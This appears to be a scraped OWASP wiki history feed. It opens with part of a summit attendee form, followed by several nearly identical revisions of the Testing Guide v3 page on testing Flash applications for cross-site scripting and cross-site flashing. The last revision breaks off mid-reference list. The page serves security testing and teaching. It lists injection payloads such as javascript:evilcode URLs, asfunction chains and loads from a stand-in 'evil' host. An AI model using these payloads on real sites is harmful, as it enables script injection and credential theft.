Release Contribution (more than 6 months old) = <br /> | Committee Membership = <br /> | Chapter Co-Leadership = <br /> | Conference Co-Leadership = <br /> |-<br /> | summit_attendee_current_owasp_involvement_name1 = <br /> | summit_attendee_current_owasp_involvement_url_1 = <br /> | summit_attendee_current_owasp_involvement_name2 = <br /> | summit_attendee_current_owasp_involvement_url_2 = <br /> | summit_attendee_current_owasp_involvement_name3 = <br /> | summit_attendee_current_owasp_involvement_url_3 = <br /> | summit_attendee_current_owasp_involvement_name4 = <br /> | summit_attendee_current_owasp_involvement_url_4 = <br /> | summit_attendee_current_owasp_involvement_name5 = <br /> | summit_attendee_current_owasp_involvement_url_5 = <br /> |-<br /> | summit_attendee_reason_for_summit_participation_name1 = XSS Sessions<br /> | summit_attendee_reason_for_summit_participation_url_1 = <br /> | notes_reason_for_participating_issues_to_be_discussed_1 = <br /> | summit_attendee_reason_for_summit_participation_name2 = Browser Security Sessions<br /> | summit_attendee_reason_for_summit_participation_url_2 = <br /> | notes_reason_for_participating_issues_to_be_discussed_2 = <br /> | summit_attendee_reason_for_summit_participation_name3 = <br /> | summit_attendee_reason_for_summit_participation_url_3 = <br /> | notes_reason_for_participating_issues_to_be_discussed_3 = <br /> | summit_attendee_reason_for_summit_participation_name4 = <br /> | summit_attendee_reason_for_summit_participation_url_4 = <br /> | notes_reason_for_participating_issues_to_be_discussed_4 = <br /> | summit_attendee_reason_for_summit_participation_name5 = <br /> | summit_attendee_reason_for_summit_participation_url_5 = <br /> | notes_reason_for_participating_issues_to_be_discussed_5 = <br /> |-<br /> | summit_attendee_owasp_sponsor = <br /> |-<br /> | summit_attendee_summit_time_paid_by_name1 =<br /> | summit_attendee_summit_time_paid_by_url_1 =<br /> | summit_attendee_summit_time_paid_by_name2 =<br /> | summit_attendee_summit_time_paid_by_url_2 =<br /> |-<br /> | summit_attendee_summit_expenses_paid_by_name1 = <br /> | summit_attendee_summit_expenses_paid_by_url_1 = <br /> | summit_attendee_summit_expenses_paid_by_name2 = <br /> | summit_attendee_summit_expenses_paid_by_url_2 = <br /> |-<br /> | reason_for_sponsorship = Active Member, Owasp Testing Guide Contributor, SWFIntruder Lead, browser security contribution<br /> |-<br /> | status = <br /> |-<br /> | letter sent to sponsor = <br /> |-<br /> | notes for Kate =<br /> |-<br /> | attendee_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Attendee075<br /> | attendee_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Attendee/Attendee075 <br /> }}</div> Wisec https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&diff=38855 Testing for Cross site flashing (OTG-CLIENT-008) 2008-09-08T13:10:18Z <p>Wisec: /* Cross Site Flashing */</p> <hr /> <div>{{Template:OWASP Testing Guide v3}}<br /> <br /> == Brief Summary ==<br /> &lt;br&gt;<br /> ActionScript is the language, based on ECMAScript, used by Flash application when dealing with<br /> interactive needs. <br /> ActionScript, like every other language, has some implementation pattern which could lead to <br /> security issues.<br /> &lt;br&gt;<br /> In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.<br /> &lt;br&gt;<br /> <br /> == Description of the Issue == <br /> &lt;br&gt;<br /> Since the first publication of &quot;Testing Flash Applications&quot; [1], new versions of Flash player <br /> were released in order to mitigate some of the attacks which will be described.<br /> Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure<br /> programming practices.<br /> &lt;br&gt;<br /> <br /> == Gray Box testing and example ==<br /> <br /> === Decompilation ===<br /> <br /> Since SWF files are interpreted by a virtual machine embedded in the player itself, <br /> they can be potentially decompiled and analysed.<br /> The most known and free ActionScript 2.0 decompiler is flare.<br /> <br /> To decompile a swf file with flare just type:<br /> <br /> $ flare hello.swf<br /> <br /> it will result in a new file called hello.flr.<br /> <br /> Decompilation helps testers in the process of testing because it<br /> moves black box to white box.<br /> <br /> There's no free decompiler for ActionScript 3.0 at the moment.<br /> <br /> <br /> === Undefined Variables ===<br /> <br /> On actionscript 2 entry points are retrieved by looking at every undefined attribute <br /> beloging to _root and _global objects, since Actionscript 2 behaves as every member <br /> belonging to _root or _global objects were instantiable by <br /> url querystring parameters. That means that if an attribute like:<br /> <br /> _root.varname <br /> <br /> results &quot;undefined&quot; at some point of code flow, it could be overwritten by setting<br /> <br /> <br /> http://victim/file.swf?varname=value<br /> <br /> Example:<br /> &lt;pre&gt;<br /> movieClip 328 __Packages.Locale {<br /> <br /> #initclip<br /> if (!_global.Locale) {<br /> var v1 = function (on_load) {<br /> var v5 = new XML();<br /> var v6 = this;<br /> v5.onLoad = function (success) {<br /> if (success) {<br /> trace('Locale loaded xml');<br /> var v3 = this.xliff.file.body.$trans_unit;<br /> var v2 = 0;<br /> while (v2 &lt; v3.length) {<br /> Locale.strings[v3[v2]._resname] = v3[v2].source.__text;<br /> ++v2;<br /> }<br /> on_load();<br /> } else {}<br /> };<br /> if (_root.language != undefined) {<br /> Locale.DEFAULT_LANG = _root.language;<br /> }<br /> v5.load(Locale.DEFAULT_LANG + '/player_' +<br /> Locale.DEFAULT_LANG + '.xml');<br /> };<br /> <br /> &lt;/pre&gt;<br /> <br /> Could be attacked by requesting:<br /> <br /> http://victim/file.swf?language=http://evil<br /> <br /> <br /> === Unsafe Methods ===<br /> <br /> When an entry point is identified the data it represents could be used by unsafe methods.<br /> If the data is not filtered/validated using the right regexp it could lead to some security issue.<br /> <br /> Unsafe Methods since version r47 are:<br /> &lt;pre&gt;<br /> loadVariables()<br /> loadMovie()<br /> getURL()<br /> loadMovie()<br /> loadMovieNum()<br /> FScrollPane.loadScrollContent()<br /> LoadVars.load <br /> LoadVars.send <br /> XML.load ( 'url' )<br /> LoadVars.load ( 'url' ) <br /> Sound.loadSound( 'url' , isStreaming ); <br /> NetStream.play( 'url' );<br /> <br /> flash.external.ExternalInterface.call(_root.callback)<br /> <br /> htmlText<br /> &lt;/pre&gt;<br /> <br /> === The Test ===<br /> <br /> In order to exploit a vulnerability the swf file should be hosted on the victim host, and<br /> the techniques of reflected Xss must be used.<br /> That is forcing the browser to load a pure swf file directly in the location bar <br /> ( by redirection or social engineering) or by loading it through an iframe from an evil page:<br /> <br /> &lt;iframe src='http://victim/path/to/file.swf'&gt;&lt;/iframe&gt;<br /> <br /> This is because in this situation the browser will self generate a Html page as if it were hosted <br /> by the victim host.<br /> <br /> <br /> === Xss ===<br /> <br /> '''GetURL:'''<br /> <br /> GetURL Function lets the movie to load a URI into Browser's Window. <br /> So if an undefined variable is used as first argument for getURL:<br /> <br /> getURL(_root.URI,'_targetFrame');<br /> <br /> This means it's possible to call javascript in the same domain where the movie is hosted by <br /> requesting:<br /> &lt;pre&gt;<br /> http://victim/file.swf?URI=javascript:evilcode<br /> <br /> getURL('javascript:evilcode','_self');<br /> &lt;/pre&gt;<br /> <br /> The same when only some part of getURL is controlled:<br /> &lt;pre&gt;<br /> Dom Injection with Flash javascript injection<br /> <br /> getUrl('javascript:function('+_root.arg+')) <br /> &lt;/pre&gt;<br /> <br /> '''asfunction:'''<br /> <br /> &quot;You can use the special asfunction protocol to cause <br /> the link to execute an ActionScript function in a SWF file <br /> instead of opening a URL...&quot; ( Adobe.com )<br /> <br /> Until release r48 of Flash player asfunction could be used on every method which has a url<br /> as argument.<br /> <br /> This means that a tester could try to inject:<br /> <br /> asfunction:getURL,javascript:evilcode<br /> <br /> in every unsafe method like:<br /> <br /> loadMovie(_root.URL)<br /> <br /> by requesting:<br /> <br /> http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode<br /> <br /> <br /> '''ExternalInterface:'''<br /> <br /> ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.<br /> <br /> From a security point of view it could be abused when part of its argument could be controlled:<br /> <br /> flash.external.ExternalInterface.call(_root.callback);<br /> <br /> the attack pattern for this kind of flaw should be something like the following:<br /> eval(evilcode)<br /> <br /> since the internal javascript which is executed by the browser will be something similar to:<br /> <br /> eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &quot;&lt;undefined/&gt;&quot;; }')<br /> <br /> <br /> <br /> === Html Injection ===<br /> <br /> TextField Objects can render minimal Html by setting:<br /> <br /> tf.html = true<br /> tf.htmlText = '&lt;tag&gt;text&lt;/tag&gt;'<br /> <br /> So if some part of text could be controlled by the tester, an a tag or a img tag could be <br /> injected resulting in modifying the GUI or Xss the browser.<br /> <br /> Some Attack Example with A Tag:<br /> <br /> * Direct XSS: &lt;a href='javascript:alert(123)' &gt;<br /> <br /> * Call AS function: &lt;a href='asfunction:function,arg' &gt;<br /> <br /> * Call Swf public functions: <br /> &lt;a href='asfunction:_root.obj.function, arg'&gt;<br /> <br /> * Call Native Static AS Function:<br /> &lt;a href='asfunction:System.Security.allowDomain,evilhost' &gt;<br /> <br /> Img tag could be used as well:<br /> <br /> * &lt;img src='http://evil/evil.swf' &gt;<br /> * &lt;img src='javascript:evilcode//.swf' &gt; (.swf is necessary to bypass flash player internal filter)<br /> <br /> Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still <br /> be accomplished.<br /> <br /> <br /> === Cross Site Flashing ===<br /> <br /> Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.<br /> <br /> XSF Occurs when from different domains:<br /> <br /> * One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it<br /> * XSF could also occurs when an HTML page uses JavaScript to command a Macromedia Flash movie, for example, by calling:<br /> ** GetVariable: access to flash public and static object from javascript as a string.<br /> ** SetVariable: set a static or public flash object to a new string value from javascript. <br /> * Unexpected Browser to swf communication could result in stealing data from swf application.<br /> <br /> It could be perfomed by forcing a flawed swf to load an external evil flash file.<br /> <br /> This attack could result in Xss or in the modification of the GUI in order to fool a user to <br /> insert credentials on a fake flash form.<br /> <br /> XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*<br /> methods are used.<br /> <br /> === Attacks and Flash Player Version ===<br /> <br /> Since May 2007 three new versions of Flash player were released by Adobe.<br /> Every new version restricts some of the attacks previously described.<br /> <br /> &lt;pre&gt;<br /> | Attack | asfunction | ExternalInterface | GetURL | Html Injection | <br /> | Player Version |<br /> | v9.0 r47/48 | Yes | Yes | Yes | Yes |<br /> | v9.0 r115 | No | Yes | Yes | Yes |<br /> | v9.0 r124 | No | Yes | Yes | Partially |<br /> &lt;/pre&gt;<br /> <br /> '''Result Expected:'''&lt;br&gt;<br /> <br /> Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.<br /> <br /> <br /> == References ==<br /> '''Whitepapers'''&lt;br&gt;<br /> * Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt<br /> <br /> * Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt<br /> <br /> * Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html<br /> <br /> * Securing SWF Applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html<br /> <br /> * The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html<br /> <br /> * The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf<br /> <br /> '''Tools'''&lt;br&gt;<br /> <br /> * SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder<br /> <br /> * Decompiler – Flare: http://www.nowrap.de/flare.html<br /> <br /> * Compiler – MTASC: &lt;http://www.mtasc.org/&gt;<br /> <br /> * Disassembler – Flasm: &lt;http://flasm.sourceforge.net/&gt;<br /> <br /> * Swfmill – Convert Swf to XML and vice versa: &lt;http://swfmill.org/&gt;<br /> <br /> * Debugger Version of Flash Plugin/Player: &lt;http://www.adobe.com/support/flash/downloads.html</div> Wisec https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&diff=38852 Testing for Cross site flashing (OTG-CLIENT-008) 2008-09-08T13:06:29Z <p>Wisec: /* Cross Site Flashing */</p> <hr /> <div>{{Template:OWASP Testing Guide v3}}<br /> <br /> == Brief Summary ==<br /> &lt;br&gt;<br /> ActionScript is the language, based on ECMAScript, used by Flash application when dealing with<br /> interactive needs. <br /> ActionScript, like every other language, has some implementation pattern which could lead to <br /> security issues.<br /> &lt;br&gt;<br /> In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.<br /> &lt;br&gt;<br /> <br /> == Description of the Issue == <br /> &lt;br&gt;<br /> Since the first publication of &quot;Testing Flash Applications&quot; [1], new versions of Flash player <br /> were released in order to mitigate some of the attacks which will be described.<br /> Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure<br /> programming practices.<br /> &lt;br&gt;<br /> <br /> == Gray Box testing and example ==<br /> <br /> === Decompilation ===<br /> <br /> Since SWF files are interpreted by a virtual machine embedded in the player itself, <br /> they can be potentially decompiled and analysed.<br /> The most known and free ActionScript 2.0 decompiler is flare.<br /> <br /> To decompile a swf file with flare just type:<br /> <br /> $ flare hello.swf<br /> <br /> it will result in a new file called hello.flr.<br /> <br /> Decompilation helps testers in the process of testing because it<br /> moves black box to white box.<br /> <br /> There's no free decompiler for ActionScript 3.0 at the moment.<br /> <br /> <br /> === Undefined Variables ===<br /> <br /> On actionscript 2 entry points are retrieved by looking at every undefined attribute <br /> beloging to _root and _global objects, since Actionscript 2 behaves as every member <br /> belonging to _root or _global objects were instantiable by <br /> url querystring parameters. That means that if an attribute like:<br /> <br /> _root.varname <br /> <br /> results &quot;undefined&quot; at some point of code flow, it could be overwritten by setting<br /> <br /> <br /> http://victim/file.swf?varname=value<br /> <br /> Example:<br /> &lt;pre&gt;<br /> movieClip 328 __Packages.Locale {<br /> <br /> #initclip<br /> if (!_global.Locale) {<br /> var v1 = function (on_load) {<br /> var v5 = new XML();<br /> var v6 = this;<br /> v5.onLoad = function (success) {<br /> if (success) {<br /> trace('Locale loaded xml');<br /> var v3 = this.xliff.file.body.$trans_unit;<br /> var v2 = 0;<br /> while (v2 &lt; v3.length) {<br /> Locale.strings[v3[v2]._resname] = v3[v2].source.__text;<br /> ++v2;<br /> }<br /> on_load();<br /> } else {}<br /> };<br /> if (_root.language != undefined) {<br /> Locale.DEFAULT_LANG = _root.language;<br /> }<br /> v5.load(Locale.DEFAULT_LANG + '/player_' +<br /> Locale.DEFAULT_LANG + '.xml');<br /> };<br /> <br /> &lt;/pre&gt;<br /> <br /> Could be attacked by requesting:<br /> <br /> http://victim/file.swf?language=http://evil<br /> <br /> <br /> === Unsafe Methods ===<br /> <br /> When an entry point is identified the data it represents could be used by unsafe methods.<br /> If the data is not filtered/validated using the right regexp it could lead to some security issue.<br /> <br /> Unsafe Methods since version r47 are:<br /> &lt;pre&gt;<br /> loadVariables()<br /> loadMovie()<br /> getURL()<br /> loadMovie()<br /> loadMovieNum()<br /> FScrollPane.loadScrollContent()<br /> LoadVars.load <br /> LoadVars.send <br /> XML.load ( 'url' )<br /> LoadVars.load ( 'url' ) <br /> Sound.loadSound( 'url' , isStreaming ); <br /> NetStream.play( 'url' );<br /> <br /> flash.external.ExternalInterface.call(_root.callback)<br /> <br /> htmlText<br /> &lt;/pre&gt;<br /> <br /> === The Test ===<br /> <br /> In order to exploit a vulnerability the swf file should be hosted on the victim host, and<br /> the techniques of reflected Xss must be used.<br /> That is forcing the browser to load a pure swf file directly in the location bar <br /> ( by redirection or social engineering) or by loading it through an iframe from an evil page:<br /> <br /> &lt;iframe src='http://victim/path/to/file.swf'&gt;&lt;/iframe&gt;<br /> <br /> This is because in this situation the browser will self generate a Html page as if it were hosted <br /> by the victim host.<br /> <br /> <br /> === Xss ===<br /> <br /> '''GetURL:'''<br /> <br /> GetURL Function lets the movie to load a URI into Browser's Window. <br /> So if an undefined variable is used as first argument for getURL:<br /> <br /> getURL(_root.URI,'_targetFrame');<br /> <br /> This means it's possible to call javascript in the same domain where the movie is hosted by <br /> requesting:<br /> &lt;pre&gt;<br /> http://victim/file.swf?URI=javascript:evilcode<br /> <br /> getURL('javascript:evilcode','_self');<br /> &lt;/pre&gt;<br /> <br /> The same when only some part of getURL is controlled:<br /> &lt;pre&gt;<br /> Dom Injection with Flash javascript injection<br /> <br /> getUrl('javascript:function('+_root.arg+')) <br /> &lt;/pre&gt;<br /> <br /> '''asfunction:'''<br /> <br /> &quot;You can use the special asfunction protocol to cause <br /> the link to execute an ActionScript function in a SWF file <br /> instead of opening a URL...&quot; ( Adobe.com )<br /> <br /> Until release r48 of Flash player asfunction could be used on every method which has a url<br /> as argument.<br /> <br /> This means that a tester could try to inject:<br /> <br /> asfunction:getURL,javascript:evilcode<br /> <br /> in every unsafe method like:<br /> <br /> loadMovie(_root.URL)<br /> <br /> by requesting:<br /> <br /> http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode<br /> <br /> <br /> '''ExternalInterface:'''<br /> <br /> ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.<br /> <br /> From a security point of view it could be abused when part of its argument could be controlled:<br /> <br /> flash.external.ExternalInterface.call(_root.callback);<br /> <br /> the attack pattern for this kind of flaw should be something like the following:<br /> eval(evilcode)<br /> <br /> since the internal javascript which is executed by the browser will be something similar to:<br /> <br /> eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &quot;&lt;undefined/&gt;&quot;; }')<br /> <br /> <br /> <br /> === Html Injection ===<br /> <br /> TextField Objects can render minimal Html by setting:<br /> <br /> tf.html = true<br /> tf.htmlText = '&lt;tag&gt;text&lt;/tag&gt;'<br /> <br /> So if some part of text could be controlled by the tester, an a tag or a img tag could be <br /> injected resulting in modifying the GUI or Xss the browser.<br /> <br /> Some Attack Example with A Tag:<br /> <br /> * Direct XSS: &lt;a href='javascript:alert(123)' &gt;<br /> <br /> * Call AS function: &lt;a href='asfunction:function,arg' &gt;<br /> <br /> * Call Swf public functions: <br /> &lt;a href='asfunction:_root.obj.function, arg'&gt;<br /> <br /> * Call Native Static AS Function:<br /> &lt;a href='asfunction:System.Security.allowDomain,evilhost' &gt;<br /> <br /> Img tag could be used as well:<br /> <br /> * &lt;img src='http://evil/evil.swf' &gt;<br /> * &lt;img src='javascript:evilcode//.swf' &gt; (.swf is necessary to bypass flash player internal filter)<br /> <br /> Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still <br /> be accomplished.<br /> <br /> <br /> === Cross Site Flashing ===<br /> <br /> Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.<br /> XSF Occurs when from different domains:<br /> One Movie loads another Movie with loadMovie* functions <br /> or other hacks and has access to the same sandbox or part of it<br /> XSF could also occurs when an HTML page uses JavaScript<br /> to command a Macromedia Flash movie, for example, by calling:<br /> <br /> * GetVariable: access to flash public and static object from javascript as a string.<br /> * SetVariable: set a static or public flash object to a new string value from javascript. <br /> * Unexpected Browser to swf communication could result in stealing data from swf application.<br /> <br /> It could be perfomed by forcing a flawed swf to load an external evil flash file.<br /> <br /> This attack could result in Xss or in the modification of the GUI in order to fool a user to <br /> insert credentials on a fake flash form.<br /> <br /> XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*<br /> methods are used.<br /> <br /> === Attacks and Flash Player Version ===<br /> <br /> Since May 2007 three new versions of Flash player were released by Adobe.<br /> Every new version restricts some of the attacks previously described.<br /> <br /> &lt;pre&gt;<br /> | Attack | asfunction | ExternalInterface | GetURL | Html Injection | <br /> | Player Version |<br /> | v9.0 r47/48 | Yes | Yes | Yes | Yes |<br /> | v9.0 r115 | No | Yes | Yes | Yes |<br /> | v9.0 r124 | No | Yes | Yes | Partially |<br /> &lt;/pre&gt;<br /> <br /> '''Result Expected:'''&lt;br&gt;<br /> <br /> Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.<br /> <br /> <br /> == References ==<br /> '''Whitepapers'''&lt;br&gt;<br /> * Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt<br /> <br /> * Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt<br /> <br /> * Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html<br /> <br /> * Securing SWF Applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html<br /> <br /> * The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html<br /> <br /> * The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf<br /> <br /> '''Tools'''&lt;br&gt;<br /> <br /> * SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder<br /> <br /> * Decompiler – Flare: http://www.nowrap.de/flare.html<br /> <br /> * Compiler – MTASC: &lt;http://www.mtasc.org/&gt;<br /> <br /> * Disassembler – Flasm: &lt;http://flasm.sourceforge.net/&gt;<br /> <br /> * Swfmill – Convert Swf to XML and vice versa: &lt;http://swfmill.org/&gt;<br /> <br /> * Debugger Version of Flash Plugin/Player: &lt;http://www.adobe.com/support/flash/downloads.html</div> Wisec https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&diff=38851 Testing for Cross site flashing (OTG-CLIENT-008) 2008-09-08T13:03:25Z <p>Wisec: /* Brief Summary */</p> <hr /> <div>{{Template:OWASP Testing Guide v3}}<br /> <br /> == Brief Summary ==<br /> &lt;br&gt;<br /> ActionScript is the language, based on ECMAScript, used by Flash application when dealing with<br /> interactive needs. <br /> ActionScript, like every other language, has some implementation pattern which could lead to <br /> security issues.<br /> &lt;br&gt;<br /> In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.<br /> &lt;br&gt;<br /> <br /> == Description of the Issue == <br /> &lt;br&gt;<br /> Since the first publication of &quot;Testing Flash Applications&quot; [1], new versions of Flash player <br /> were released in order to mitigate some of the attacks which will be described.<br /> Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure<br /> programming practices.<br /> &lt;br&gt;<br /> <br /> == Gray Box testing and example ==<br /> <br /> === Decompilation ===<br /> <br /> Since SWF files are interpreted by a virtual machine embedded in the player itself, <br /> they can be potentially decompiled and analysed.<br /> The most known and free ActionScript 2.0 decompiler is flare.<br /> <br /> To decompile a swf file with flare just type:<br /> <br /> $ flare hello.swf<br /> <br /> it will result in a new file called hello.flr.<br /> <br /> Decompilation helps testers in the process of testing because it<br /> moves black box to white box.<br /> <br /> There's no free decompiler for ActionScript 3.0 at the moment.<br /> <br /> <br /> === Undefined Variables ===<br /> <br /> On actionscript 2 entry points are retrieved by looking at every undefined attribute <br /> beloging to _root and _global objects, since Actionscript 2 behaves as every member <br /> belonging to _root or _global objects were instantiable by <br /> url querystring parameters. That means that if an attribute like:<br /> <br /> _root.varname <br /> <br /> results &quot;undefined&quot; at some point of code flow, it could be overwritten by setting<br /> <br /> <br /> http://victim/file.swf?varname=value<br /> <br /> Example:<br /> &lt;pre&gt;<br /> movieClip 328 __Packages.Locale {<br /> <br /> #initclip<br /> if (!_global.Locale) {<br /> var v1 = function (on_load) {<br /> var v5 = new XML();<br /> var v6 = this;<br /> v5.onLoad = function (success) {<br /> if (success) {<br /> trace('Locale loaded xml');<br /> var v3 = this.xliff.file.body.$trans_unit;<br /> var v2 = 0;<br /> while (v2 &lt; v3.length) {<br /> Locale.strings[v3[v2]._resname] = v3[v2].source.__text;<br /> ++v2;<br /> }<br /> on_load();<br /> } else {}<br /> };<br /> if (_root.language != undefined) {<br /> Locale.DEFAULT_LANG = _root.language;<br /> }<br /> v5.load(Locale.DEFAULT_LANG + '/player_' +<br /> Locale.DEFAULT_LANG + '.xml');<br /> };<br /> <br /> &lt;/pre&gt;<br /> <br /> Could be attacked by requesting:<br /> <br /> http://victim/file.swf?language=http://evil<br /> <br /> <br /> === Unsafe Methods ===<br /> <br /> When an entry point is identified the data it represents could be used by unsafe methods.<br /> If the data is not filtered/validated using the right regexp it could lead to some security issue.<br /> <br /> Unsafe Methods since version r47 are:<br /> &lt;pre&gt;<br /> loadVariables()<br /> loadMovie()<br /> getURL()<br /> loadMovie()<br /> loadMovieNum()<br /> FScrollPane.loadScrollContent()<br /> LoadVars.load <br /> LoadVars.send <br /> XML.load ( 'url' )<br /> LoadVars.load ( 'url' ) <br /> Sound.loadSound( 'url' , isStreaming ); <br /> NetStream.play( 'url' );<br /> <br /> flash.external.ExternalInterface.call(_root.callback)<br /> <br /> htmlText<br /> &lt;/pre&gt;<br /> <br /> === The Test ===<br /> <br /> In order to exploit a vulnerability the swf file should be hosted on the victim host, and<br /> the techniques of reflected Xss must be used.<br /> That is forcing the browser to load a pure swf file directly in the location bar <br /> ( by redirection or social engineering) or by loading it through an iframe from an evil page:<br /> <br /> &lt;iframe src='http://victim/path/to/file.swf'&gt;&lt;/iframe&gt;<br /> <br /> This is because in this situation the browser will self generate a Html page as if it were hosted <br /> by the victim host.<br /> <br /> <br /> === Xss ===<br /> <br /> '''GetURL:'''<br /> <br /> GetURL Function lets the movie to load a URI into Browser's Window. <br /> So if an undefined variable is used as first argument for getURL:<br /> <br /> getURL(_root.URI,'_targetFrame');<br /> <br /> This means it's possible to call javascript in the same domain where the movie is hosted by <br /> requesting:<br /> &lt;pre&gt;<br /> http://victim/file.swf?URI=javascript:evilcode<br /> <br /> getURL('javascript:evilcode','_self');<br /> &lt;/pre&gt;<br /> <br /> The same when only some part of getURL is controlled:<br /> &lt;pre&gt;<br /> Dom Injection with Flash javascript injection<br /> <br /> getUrl('javascript:function('+_root.arg+')) <br /> &lt;/pre&gt;<br /> <br /> '''asfunction:'''<br /> <br /> &quot;You can use the special asfunction protocol to cause <br /> the link to execute an ActionScript function in a SWF file <br /> instead of opening a URL...&quot; ( Adobe.com )<br /> <br /> Until release r48 of Flash player asfunction could be used on every method which has a url<br /> as argument.<br /> <br /> This means that a tester could try to inject:<br /> <br /> asfunction:getURL,javascript:evilcode<br /> <br /> in every unsafe method like:<br /> <br /> loadMovie(_root.URL)<br /> <br /> by requesting:<br /> <br /> http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode<br /> <br /> <br /> '''ExternalInterface:'''<br /> <br /> ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.<br /> <br /> From a security point of view it could be abused when part of its argument could be controlled:<br /> <br /> flash.external.ExternalInterface.call(_root.callback);<br /> <br /> the attack pattern for this kind of flaw should be something like the following:<br /> eval(evilcode)<br /> <br /> since the internal javascript which is executed by the browser will be something similar to:<br /> <br /> eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &quot;&lt;undefined/&gt;&quot;; }')<br /> <br /> <br /> <br /> === Html Injection ===<br /> <br /> TextField Objects can render minimal Html by setting:<br /> <br /> tf.html = true<br /> tf.htmlText = '&lt;tag&gt;text&lt;/tag&gt;'<br /> <br /> So if some part of text could be controlled by the tester, an a tag or a img tag could be <br /> injected resulting in modifying the GUI or Xss the browser.<br /> <br /> Some Attack Example with A Tag:<br /> <br /> * Direct XSS: &lt;a href='javascript:alert(123)' &gt;<br /> <br /> * Call AS function: &lt;a href='asfunction:function,arg' &gt;<br /> <br /> * Call Swf public functions: <br /> &lt;a href='asfunction:_root.obj.function, arg'&gt;<br /> <br /> * Call Native Static AS Function:<br /> &lt;a href='asfunction:System.Security.allowDomain,evilhost' &gt;<br /> <br /> Img tag could be used as well:<br /> <br /> * &lt;img src='http://evil/evil.swf' &gt;<br /> * &lt;img src='javascript:evilcode//.swf' &gt; (.swf is necessary to bypass flash player internal filter)<br /> <br /> Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still <br /> be accomplished.<br /> <br /> <br /> === Cross Site Flashing ===<br /> <br /> Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.<br /> XSF Occurs when from different domains:<br /> One Movie loads another Movie with loadMovie* functions <br /> or other hacks and has access to the same sandbox or part of it<br /> XSF could also occurs when an HTML page uses JavaScript<br /> to command a Macromedia Flash movie, for example, by calling:<br /> GetVariable: access to flash public and static object<br /> from javascript as a string.<br /> SetVariable: set a static or public flash object to a new <br /> string value from javascript.<br /> Or other scripting method.<br /> Unexpected Browser to swf communication could result in stealing data from swf application.<br /> <br /> It could be perfomed by forcing a flawed swf to load an external evil flash file.<br /> <br /> This attack could result in Xss or in the modification of the GUI in order to fool a user to <br /> insert credentials on a fake flash form.<br /> <br /> XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*<br /> methods are used.<br /> <br /> === Attacks and Flash Player Version ===<br /> <br /> Since May 2007 three new versions of Flash player were released by Adobe.<br /> Every new version restricts some of the attacks previously described.<br /> <br /> &lt;pre&gt;<br /> | Attack | asfunction | ExternalInterface | GetURL | Html Injection | <br /> | Player Version |<br /> | v9.0 r47/48 | Yes | Yes | Yes | Yes |<br /> | v9.0 r115 | No | Yes | Yes | Yes |<br /> | v9.0 r124 | No | Yes | Yes | Partially |<br /> &lt;/pre&gt;<br /> <br /> '''Result Expected:'''&lt;br&gt;<br /> <br /> Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.<br /> <br /> <br /> == References ==<br /> '''Whitepapers'''&lt;br&gt;<br /> * Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt<br /> <br /> * Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt<br /> <br /> * Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html<br /> <br /> * Securing SWF Applications: 